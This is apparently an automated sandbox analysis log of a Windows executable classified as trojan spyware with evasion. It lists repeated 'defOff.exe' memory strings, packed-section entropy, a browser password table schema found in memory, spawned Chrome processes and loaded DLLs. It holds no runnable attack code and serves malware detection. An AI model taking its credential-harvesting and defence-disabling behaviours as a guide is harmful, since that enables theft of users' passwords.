        Source: C:\Users\user\Desktop\file.exeCode function: 3_3_0058C0283_3_0058C028
        Source: file.exe, 00000003.00000003.1608219237.000000000588D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609187478.0000000005891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603130646.00000000057A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606683289.0000000005910000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613654041.00000000059DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603461134.0000000005407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607834398.0000000005868000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610813514.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611578637.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1604742845.00000000057A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609540178.00000000057A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613790586.00000000057B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640714280.00000000005C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610167890.00000000057A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1617310850.00000000058EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612837210.00000000057A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000002.1737191932.0000000005D16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614526739.00000000057A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607727315.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640516045.00000000053B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607628760.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1617097056.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609665413.000000000588E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616401929.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606785700.00000000057B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606166272.000000000585D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1608471795.000000000587A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614976697.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614237060.00000000057AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616680885.00000000058E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607173057.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612560054.00000000058A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607254389.0000000005863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612419668.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610416004.00000000057A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605515126.00000000058EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606267675.00000000057A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603380366.000000000584F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1617670988.00000000057A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607357455.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1602971131.00000000055A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640784527.000000000058D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606892053.0000000005868000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640643368.0000000005302000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607533177.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603044524.0000000005408000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606054937.00000000057AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605070089.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611266293.00000000057AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616000203.0000000005A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606573240.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613236495.00000000058B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1615885151.00000000058DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1608341225.00000000057A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640549831.000000000532B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605189808.000000000584A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606364448.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610537559.00000000058A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614080006.00000000059F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616136310.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610289573.000000000589F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609896304.00000000057AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605870240.0000000005854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610043354.0000000005892000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613374524.00000000057A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1615138798.00000000058DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609306063.00000000057A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1604840438.0000000005845000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616905441.0000000005A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613095001.00000000057A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610674996.00000000059A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1615740375.00000000057A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611997307.00000000057A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1610945615.000000000589D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616271286.00000000058DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606463504.00000000057A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605391162.0000000005845000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605716492.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614814935.00000000059F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1605278942.00000000057A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612949120.00000000058B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607995094.000000000593F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1640714280.00000000005AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609425042.0000000005884000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611424674.00000000058AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603215948.0000000005403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1608950926.000000000595B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612146853.00000000058AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609794068.0000000005981000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607076316.000000000586F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1609078389.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1616536172.00000000057A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611104329.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613940074.00000000058C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1607439042.0000000005865000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1613513785.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1615360331.00000000057AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1603300363.00000000057AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612282799.00000000059BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614386003.00000000058E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1608107621.00000000057B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1606994469.00000000057A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1615585047.00000000058D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1617488333.0000000005A3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1612693737.00000000059B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1611718183.00000000058B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000002.1736838281.0000000005A56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1614667313.00000000058C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000003.00000003.1617840099.00000000058F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993019979508196
        Source: file.exeStatic PE information: Section: rriqemsb ZLIB complexity 0.9946638155876035
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@9/6
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exe, 00000003.00000003.1354014919.000000000531D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1381361292.0000000005328000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353723531.0000000005339000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: file.exeReversingLabs: Detection: 44%
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=1908,i,3407012707208329137,12783355728101438977,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1932,i,12659663742680586460,29782516825973807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=1908,i,3407012707208329137,12783355728101438977,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1932,i,12659663742680586460,29782516825973807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
